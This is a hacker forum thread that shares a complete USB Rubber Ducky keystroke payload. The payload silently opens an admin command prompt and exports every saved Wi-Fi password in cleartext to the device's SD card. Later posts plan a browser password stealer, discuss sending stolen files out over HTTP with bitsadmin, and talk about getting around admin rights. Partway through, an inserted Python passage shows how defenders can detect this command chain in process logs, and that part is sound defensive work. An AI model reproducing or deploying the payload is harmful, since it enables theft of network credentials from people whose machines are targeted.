[Payload] Wi-Fi password stealer saving to SD.


crashie

This stealer script exports all the Wi-Fi passwords to the SD card mounted in the Rubber Ducky.
Requirement: this one is to be used with the Twin Duck firmware.
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
DELAY 500
ENTER
DELAY 300
STRING netsh wlan export profile folder=%myd%\ key=clear 
ENTER
DELAY 500
STRING exit
ENTER
Edited by crashie
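From the defender's side, the payload above leaves a recognisable trace in process-creation logging (Sysmon Event ID 1 or Security 4688 with command-line auditing): a `wmic volume` label lookup followed by `netsh wlan export profile ... key=clear` under the same parent `cmd.exe`. The following is an added example, not code from the thread or from Hak5; the event records are constructed to mirror that chain, and the field names (`pid`, `ppid`, `image`, `cmdline`) are an assumed simplified shape rather than any product's schema.

```python
import re

# Constructed sample records (not real logs) in a simplified process-creation
# shape. 4112 and 4120 reproduce the thread's payload as cmd.exe children;
# 5000 is a benign netsh invocation that must not fire.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3980, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd"},
    {"pid": 4112, "ppid": 4100, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic volume get driveletter, label | findstr "DUCKY"'},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r"netsh wlan export profile folder=E:\ key=clear"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh wlan show interfaces"},
]

# Rule table: (name, pattern over the command line, stand-alone severity).
# key=clear is what makes the export dump the PSK in plaintext, so that rule
# is high on its own; a volume-by-label lookup alone is only weak evidence.
RULES = [
    ("wlan_profile_export_cleartext",
     re.compile(r"netsh\s+wlan\s+export\s+profile\b.*\bkey=clear\b", re.I),
     "high"),
    ("removable_volume_lookup_by_label",
     re.compile(r"wmic\s+volume\s+get\b.*\blabel\b.*findstr", re.I),
     "low"),
]


def evaluate(events):
    """Return per-event findings, plus a 'chain' finding when every rule
    fires under the same parent process (the payload's cmd.exe)."""
    findings = []
    rules_per_parent = {}
    for ev in events:
        for name, pattern, severity in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append({"pid": ev["pid"], "ppid": ev["ppid"],
                                 "rule": name, "severity": severity})
                rules_per_parent.setdefault(ev["ppid"], set()).add(name)
    for ppid, names in rules_per_parent.items():
        if len(names) == len(RULES):
            findings.append({"pid": None, "ppid": ppid,
                             "rule": "wifi_export_to_removable_chain",
                             "severity": "critical"})
    return findings
```

The regexes tolerate cmd's caret escaping, since `^,` in the Ducky script reaches the child process as a plain comma.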

Thanks! I've been playing around all weekend and am getting the hang of things now :P

I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights, of course; it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there, but some get flagged by the AVs, like NirSoft's, and others are too heavy in size because of a GUI..

And btw, take a look at the bitsadmin payload.. sending files over HTTP :P

Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P

/crashie

Great work with these new payloads man! keep it up! :rolleyes:


Really excited to see this. Does it require admin rights?

Yeah, sadly enough it does.. the CMD has to run as admin, so the local user has to be in that group, yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.

To steal the browser passwords (Opera, Safari, Firefox, Chrome) though, it's not needed :P I will add that payload later this week when it's finished and tested completely. One version that saves it to the SD and one that sends it out over HTTP. Bitsadmin works great for sending stuff over the Internet as HTTP, but it requires an IIS server on the other end.

I am, though, working on an exploit to also be able to steal the Wi-Fi passwords in clear text without being admin, as I said.. but it will take some time to finish since I'm working on it alone.

But I'll keep posting the results here :)

/crashie


Well.. I wrote a script using these basic techniques and it exported just fine since my user was an admin. I think the vast majority of people on Windows are single users running as admin, so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my SD card. I will try this script and see if it does the magic.


Yeah, you're right :P Most of the users run as local admin. The wmic should work great.. works fine here at least :) Also keep in mind your keyboard layout so it has the right symbols.. this one won't work with Danish, Norwegian or Swedish layouts because of a missing ^ in the properties file..


  • 6 months later...

I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.


  • 4 weeks later...

I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to, right? Let Windows do the work.

http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html

I plan on checking this out sometime when I get home tomorrow. But if the article is correct (Tim Tomes linked to it, and he's freakin' awesome), those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista, when they changed the way Windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.


Hey, I have added your idea to my power-ducky toolkit. It should work, but I don't have a Windows laptop with wireless to test. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/


  • 2 weeks later...

You can't recover wifi keys without admin access. I've already attempted it, as well as taking a look at some of Microsoft's tutorials on how the encryption algorithm works. It's impossible to recover the keys without the correct permissions. The payload "ULTIMATE DATA THEIF!" does way more than just stealing wifi passwords.
